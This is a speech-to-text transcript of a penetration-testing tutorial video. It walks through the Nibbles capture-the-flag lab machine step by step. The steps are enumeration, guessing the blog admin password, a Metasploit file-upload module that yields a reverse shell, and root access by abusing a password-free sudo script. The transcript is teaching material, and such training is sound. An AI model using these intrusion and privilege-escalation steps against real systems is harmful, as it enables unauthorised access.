Pentesting for n00bs: Episode 6 - Nibbles

Key Takeaways

what is up everybody welcome to episode 6 of pentesting for noobs on today's episode we are going to be working on a box called nibbles now nibbles is a linux-based machine and it's gonna teach us a little bit about web enumeration and more importantly it's gonna teach us some of the basics of Linux privilege escalation especially with the sudo - L command and we'll get into that a little bit further as we get into the machine so as always if you like this video please do hit that like button the subscribe button and hit that Bell as well and of course leave a comment if you liked the video if you found room for improvement also leave a comment on that so nipples live at 10 10 10 . 75 go ahead and get your nmap scan started on that boot up your machine do everything you need to do as we've done in the past episodes and I will meet you over in the video all right now on our Cali machine taking a look at our end maps can we see that there are two ports that have returned one is port 22 which is SSH and the other is port 80 which is HTTP now in this scenario it's actually quite common and we've talked about it in previous videos where you see something like port 22 in port 80 and that's it in this vector especially on easy machines like this for capture-the-flag typically port 80 is the way in and port 22 would be utilized in some way later on you might get a reverse shell in port 80 you might find credentials on port 80 something here might lead us to a nice shell here later on typically the version of SSH is not the way in there's not like usually RCEs or remote code execution on versions so we could search definitely on this open SSH and see if there's anything out there my guess would be there isn't on top of that we see that there is a bun to running on the machine so this would be useful information for us just during information gathering process so we'll store this in our back pocket it and know that it's running Ubuntu on the back end so we already know we're up against the Linux machine on top of that we can kind of tell we're against a Linux machine with the SSH and the Apache here so again Ubuntu showing here on this HTTP service so a couple things that we can do is we can look for exploits against Apache as well so for example in the tool that I haven't shown you but wanted to show you is a tool called search Philippe so we could say hey we've got a patchy open and maybe we want to just quickly know is there any kind of exploits for this two point four point one eight well we come down here and we can start typing in search boy and just go ahead and tab and autocomplete now the thing I will say about search boy is that you don't have to be very specific if you're very specific with your query it's actually worse off for you and I'll show you an example so if you say hey I'm up against Apache two point four point one eight it's gonna say I didn't find anything but if we back that out a little bit and we say hey we're against Apache two point four okay now some stuff start showing up when we get very version specific like this we might actually miss some details in terms of exploits as you can see here there's an exploit right here from two point four one seven to two point four point three eight and this two point four point one eight actually falls in line in here so it's important to note that let's not be too specific if we use a search play tool now what search Boyd is doing is it's pulling down from exploit database which is actually already pulled down in updates on your machine since Kali the owners of Kali Linux also run exploit database they have a nice little repository of all the exploits that are on exploit database on your machine so we're just doing an offline search here we don't even have to touch the web to do this search in any exploit that has been pulled down is available on your machine you can see we have a shell script here PHP if we see a dot RB for Ruby that means it's a Metasploit module most the time so we could see those things as well and for example on the exploit we can tell some other things as well it's a exploit for Linux that's good that checks a box but it's a local exploit meaning we have to be on the machine or some sort of already have access to it right to exploit this so this isn't gonna work for us we're more after a remote exploit of some sort and we're really not after any kind of denial of service exploits typically especially in a real pen test those are out of scope but when we're talking about having a capture the flag like we're doing here these are really out of scope right we don't want to deny service to our box there's no point in doing that now say this was a two point four point one seven and we know it's vulnerable to denial service on a report we would actually write this up we'd absolutely write it up we would note hey you know this version is vulnerable to XY and Z including denial service see these write-ups here as to what can happen if it was running on Windows so let's go ahead and do a little bit of further enumeration I don't think Apache two point four point one eight is actually the way in here so if we go out to the interwebs and we just say 10.10 ten dot 75 and we get a hello world okay so not a lot to go on here there's a few things that I always do when I when I first get to a web page and I'm gonna note that this box does teach valuable lessons again we're starting to get off of the really really easy machines and this is still gonna be easy this is going to feel more capture-the-flag like than anything else that we've done so far and that's okay we're starting to get into some of these half the box machines that are gonna feel capture-the-flag and our take on this is going to be that from a realistic perspective as much as we can do but there are going to be some methods along the way that we're going to encounter that are gonna be capture the flag like on top of that there's gonna be homework that I'm gonna give you a good machine here towards the end that I think is going to allow us I've skipped a couple machines that are really easy and kind of repetitive we done I'm going to give that as homework to allow us to test our knowledge and see where we need to fill in gaps and then we'll do a quick review video for that here in the future but I'll give that out towards the end of the video so back into this session here few things that we can do from this point we can go ahead and start up nikto scan and do some vulnerability scanning against this webpage we can take the directory here and do some directory busing because if we just see this and this is all we have we don't have any links or anything maybe there's something running on the back end of this the server here and we'll have to use directory busting to find that on top of that we can do some enumeration here if you have a tool called WAP eliezer now apple Iser is a great tool you can see here that we've pulled down a patch in ubuntu if you don't have lab wise or installed I do recommend just googling wap eliezer here and installing this plugin for your firefox so from here let's go ahead and just right-click and view the source I said this to you guys before but again especially and capture the flags they like to hide little comments in the source code this is a realistic perspective in the sense that we should be looking for comments and source codes by developers we should be looking for hard-coded credentials and anything of value that might be in source code so it's always important to look at the source code as you can see here there is a comment pointing to a nibble blog directory so we're just gonna copy this and come over here and I'm just gonna type it out but go into nibble blog not the admin page just like this and you'll see that we are given this nice little blog here you can see nibbles yum yum and we've got that HelloWorld and not a whole lot of anything else you got some categories we can click around and numerate see if there's anything here that we can do and for the most part we are pretty stuck we can view the the source code and see if there's any information on this nibbles blog here okay if we can see any kind of version or what it's running on with a platform I'm not seeing anything right off the bat we can come back and also look at the whap Eliezer and see if there's anything of interest here okay it's running on jQuery it's running on PHP that might help us if we get some sort of exploit going for this so in terms of what we see there's nothing readily available I don't have anything to exploit so the next thing that we would do here is we would do a quick search on this we can just say search boy I could type in the panel here search blight and we'll just say something like nibbles okay that didn't work how about nibble see I got too specific there okay so it is actually called nibble blog and we can see that there's a couple exploits out for it one is a version 3 and it's got sequel injections on the web app and then we've got a 4.0.3 that's very specific on an arbitrary file upload that allows remote code execution and it's a dot RB which means this is a Metasploit module available so what's the difference between these two well a sequel injection can lead to a shell it can lead to database dumps it can lead to a lot of malicious stuff but not always you could get sequel injection and not find anything of interest on the attack side this thing here this arbitrary file upload with remote code execution way more juicy remote code execution means that we could be sitting at our house exploit this and get code execution to talk back to us without ever having to be local ok so in terms of the nasty or exploit it's this all the way now we don't know what either of these do but the one I would be eager to look at is this 4.0.3 so in order to do that I'm just gonna boot up Metasploit really quick and we can actually load up that module and see a little bit more information we could also go out to the web and do this to look at the file and we could actually probably read the Ruby file and pull the information down but just in a clear-cut way let's just search nibble real quick and then we'll just copy this guy here and say use paste and then all we have to do is type info so from info we can see the description here it says nibble ball contains a flaw that allows authenticated authenticated remote attacker to execute arbitrary PHP code this was tested in 4.0.3 we've got a blog about it here we've got the CDE details a very interesting stuff but if it says authenticated that means we need to authenticate that means there's probably some sort of login page somewhere so what can we do here well we don't see an admin panel or login page or anything we could just type in admin and get lucky which is what I did right off the bat I just typed an admin dot PHP and found it now there are other methods to doing this as well we could go into a new tab here and we could run something like der buster and in der Buster we could copy this address here like this and just paste it and then add in the 80 at the end right here like this now my typical settings would be to say to go faster on this and we can browse to our file and do something like base here and then we're gonna go to user go to share and just start typing word list so type in wo and you'll see word list comes up second in here there's a der bus your folder I believe I've actually shown you guys this before but doesn't hurt to show it again and I always choose the medium list because I like to be as robust as possible we can start with the nibbles vlog directory so we just say nibble blog here I keep calling it nibbles because that's the name of the machine but it's definitely nibble blog and then we know it's a PHP extension we can totally look for the just PHP if we wanted to look for more we could say like text back files zip files rar files PDF any kind of extension you want here just for the sake of purpose in time sake we're just gonna search for PHP and we'll go ahead and start that on the nibble blog itself now it's already finding a ton of info we go to the tree view I like the tree view you can see there's index admin install update sitemap okay so there's a lot of stuff here for for this in particular now we found the admin area by just guessing the admin area and if we did some research on the blog we probably could have found where the admin page was as well we could say hey nibble where where's nibble act or the nibble blog at right so we see some interesting information you can see it's pulling down a ton of files through here as well so I'm gonna go ahead and actually just stop this we don't need to run this whole thing so here's some things you can do we write a nibble blog admin area now this won't have default credentials right this is somebody's personal blog and in order to save time we're just gonna talk through this process what we could do is build out a brute force similar to the last episode where we captured or intercepted here and we attempted - we could use burps sweet an intruder right and try to do a username and password something along the lines of admin or administrator and then use a common bad password list here and see if we can get in we could also go to the nibble blog page itself if we just go back let me delete this and we'll just go to nibble blog and we could come here and if there were actual blog information we could use a tool something like cool see ewl and try to pull down information we could pull down words off of this list and we can say hey what words do they use in their blog that maybe we can perhaps relate to them and use as a password we don't need to do that here there's not a lot but if we look at some words on here the password actually ends up being right here with nibbles so nibbles is going to be our password there's actually a time out I believe if we enter in too many incorrect users and passwords so we're not gonna do that and if you're interested in brute forcing with burp sweet episode five I believe was the episode where we took brute-forcing and we we used a burp suite to do that so let's just go ahead and type an admin and then lowercase just type in nibbles and you'll see that we get access to the page so we have access we need to determine if this is actually 4.0.3 because that's important right we need to know if this is the right version for us so we can go into settings here if you just click around what you should be doing as well is enumerate this whole application if you log into an application you should be looking at what you can do can you upload can you be malicious you can manage pages or settings there's themes there's all kinds of stuff in here right but if we come to the settings page here on the first settings tab and we scroll all the way down you could see that we are running nibble blog 4.0.3 this is money this is confirmed right we we have what we need we've got user credentials a we can effectively do this so let's do this let's go back to our Metasploit that we had and I'm going to close out this dirt Buster here okay so if we looked at our our options show out with our info as well so we need a password required we need a target URI okay and we need a username so oh we also need our host so we're gonna have to supply a few things here let's go ahead and set the password to nibbles we'll set the username to admin will set the our host is it host or host our hosts to 10.10 1075 and I believe we're gonna need to set the target URI to admin dot PHP and I could be incorrect here but we'll see okay now let's show options again real quick and we only have one target this looks okay everything looks like we set it correctly so let's go ahead and type run and see if that works okay so that didn't work because I am dumb if you notice we're actually at nibble blog slash admin so let's set the target URI to let's just try a nibble blog first and then I think it actually knows where the admin directory is so let's just do forward slash nibble blog and then we'll run this there we go and now we got a session so you can see what it's doing is it's uploading a malicious image PHP and if you want to see where that's happening at we can come into our settings here and go into plugins and under plugins there's a my image if you actually go to configure here you can see that we have the ability to upload an image now this image we're uploading is a dot PHP that should not be happening right we should have some sort of black listing going on or white listing on extensions that we want to run but if we try to upload a PHP file we're allowed to do so since we're allowed to do that we can then call that PHP file execute it and get a reverse shell on this system so easy easy breezy here so now we've got a shell we can do this info and look at some information here so this is good information off the bat we can see that we've got a four point four point zero lube unto 104 generic we always want to look for this for privilege escalation purposes so if we're not the high level user let's get our UID real quick we're not a high level user we're 1,001 here so you can see nibbler we are not route so we're going to need to do some privacy one very very nice thing to do is to just search the Ubuntu on this and look for privacy that's one of the first steps we would do but let me go ahead and get into the machine will type shell and let's look at the present working directory or print working directory okay let's go into the home folder and Who am I we are nibblers let's CD into nibbler and then let's just LS real quick so let's LS - la see what's going on here okay so a couple things we can grab the user text file here we also have the ability to I'm going to type out or sorry cat the user text we have the ability here to look at a few things someone that I always like to look at right off the bat is history okay the history commands not found now the history command would show us all the history that the user had typed previously now in this instance we don't have it commands not found that's fine but in historical purposes you never know if a user's typing in a password or so some source of some sort of credentials there I can't talk today apparently another place to look is you see that bash history we could just cat bash underscore history and see if there's anything there and unfortunately there's not so what can we do here well another thing that I like to do before I go searching and hunting for a bass is I like to do a pseudo - L and this might take a second on this machine this machine is having a little bit of timeout issues it could be with our our shell that we have here since we don't have TTY interaction but that's okay just give it a second and once that happens well it will take a look but so pseudo - L is for no passwords so if you don't know what pseudo is pseudo is running as an admin or running a command or a privileges root or admin and it requires a password to do that so if you're not familiar with sudo maybe go back and learn some more Linux and just give it a little bit more familiar with the basics of Linux but here we're able to run a command without a password so if we were wanted to do something for example let's say cat Etsy shadow we wanted to get a shadow file permission denied now we might be a member of the pseudo group right and we could say pseudo Etsy shadow or the pseudo errs but we need to enter a password here and we don't know the password we didn't get in with a password so unless we stumble across the password or we figure out the password then we're kind of stuck but we have the ability to run something without a password here and it's this monitored SH in our personal stuff folder so we can LS - la again and you can see there is no personal or stuff folder so there's gonna be no monitor Sh as well what that means is we have the ability to create a shell script here in these folders and get malicious but a couple of things before we actually root this machine so this one's pretty straightforward on what it can do and I think the next video we're gonna do is going to be somewhere around the pseudo - L again so you can just see how these things sort of work and how we might have to do a little bit of investigative measures so what we've got here is we've got some enumeration we could do there's this personal tip and if in the back your mind you're saying what's that personal not zip perfect thought process right we should download this in a perfect world enumerate it see what's in there see if there's any password protections try to crack those etc but just for the sake of time in this video so it doesn't run too long we're not gonna go down that rabbit hole I'm gonna show you the ways and now there are some good scripts out there say it wasn't this obvious to us or there wasn't a pseudo - shell and there's no history and we search on the the we could type you name you name - a we search on the you name here and we look for this this abun - and google and say hey cribbage escalation on four point four point zero - 104 generic and nothing comes up okay that's another step that we could take see if there's any exploits for this no that comes up well there are some great scripts out there and I'm gonna leave you to do your own research on this but there is a script called Lin e nu mu s H there is also a Linux Prive checker dot PI both of these are absolutely gold when it comes to a numerating Linux most Ubuntu Linux machines come with Python installed and almost always they can run shell right so they can run these bash scripts so with that being said maybe a challenge to you in this video is to go find these download them and then transfer the files onto these machines how do we transfer the file so we'll do an example real quick and then I'll let you figure out how to run and execute them so we need to create a malicious file that will allow us to run as root here we have a home nibbler we need to create a new folder called personal and we need to make a CD into that make a new folder called stuff CD and stuff and if we print the working directory okay we're there so now we need to make a malicious file right we've got a monitor SH we can do we could do a touch monitored SH or we can do we can actually just echo a command into there if we want we could echo bash - I and we can just say put that into monitored SH something like this LS and then you cat that monitor SH and see that it just says bash that I or - I and well I'll explain this here in a second now I did say I was gonna do a file transfer we could do the exact same thing with Doug you get say we're over here and we we made that file I'm just gonna show you again say we I'll make it over here echo bash - I into monitored SH and okay we should be able to cat monitored SH and should be fine now we can just start up Python - M simple HTTP server on port 80 and I'm not gonna actually grab this file but you guys should have seen this before right well we'll just do a double you get here or a curl if we need to W get on HTTP whatever your IP address is here slash monitored SH and that would get that file as well so we could just use the echo command here and make it straightforward so how do we exploit this now and what are we doing why did I just do this bash - I well bash - I just means bash interactive what we're about to do with a sudo command is we can run this file as soon and make it execute right and when we execute it's going to echo out or it's gonna run the script which is says batch Josh I it's gonna give me interactive bash shell that interactive bash shell is going to be run as root because we're executing it with sudo as root now one thing that we should do here is we should make this file executable if we LS - la you can see the permissions here say that we are not executable we only have readwrite access right now so let's change this to executable as well and you should always do this on your shell scripts and we'll say LS - la one more time and you can see now the exes have been added ok so with this let's go ahead and sudo this script here let's just say sudo monitor Sh run that it might take a second we could say Who am I let's see if this actually works so again we're timed out here you could see that it timed out earlier on a command as well so this machine has a little bit of timeout issues so just give it a quick second here to load and there you go and again it says we're nibbler let's try it one more time and say Who am I and we are still nibbler what's our ID we are still nibbler why are we still nibbler let's take a look again so if we cat monitored Sh Bosch - I alright let's try running this as pseudo home nibbler personal stuff monitor Sh and then we'll do it ID at the end of this let's give this a go see if this works and again if you want these scripts all you got to do out there is go out there and Google these these are great you should find these here on pretty easily let's go to Google and I see we got our shell back linen oom2 SH download you see that so reboot user on this one and then Lynn prep checker there's actually a Linux privilege escalation oh here you go next privilege escalation scripts down here net sec pretty good as well linen noon Lin red checkered this scott milk blog is actually really good too so if you check out the gatineau blog you can see all the different commands that we're not gonna cover today but he did a great job putting this blog together on what you should be looking for and then people went out and automated tools that will help do that same stuff for you all that searching for you all the hard work so we had to run this and we we tried to sudo this monitor we had to run the full directory with monitor in there and that will actually allow us to resolve to the UID of route so doing this pseudo here does not work doing it this way will work so now you can see we are route we can go ahead and take advantage of that by going to the root folder PWD okay so we are root at nibbles right so easy easy we can LS and there's the root dot txt I keep wanting to do type I've been working in Windows so much lately okay same type cat root X and you can get your root flag as well and go submit those so that is it for this lesson from here there is a box that I want you guys to do that box is called optimum look for the box optimum and go ahead and give that a go in the next video we'll cover that as a precursor and then we'll go into another lesson but give optimum ago and see if you can do it on your own give yourself a little confidence and see if you can treat that on your own and we'll go from there so again thank you thank you for watching this video please do hit that like subscribe and the bell leave a comment down below if you are watching this video and you want to watch it sooner or you like the work that I do please do consider donating to patreon patreon members get early access you get some cool stickers some cool swag you get to see the videos early as well and some cool cool little features on discord so please do consider supporting channel in that in that way other than that thank you so much for joining me and until next time my name is a cyber mentor and I will catch you later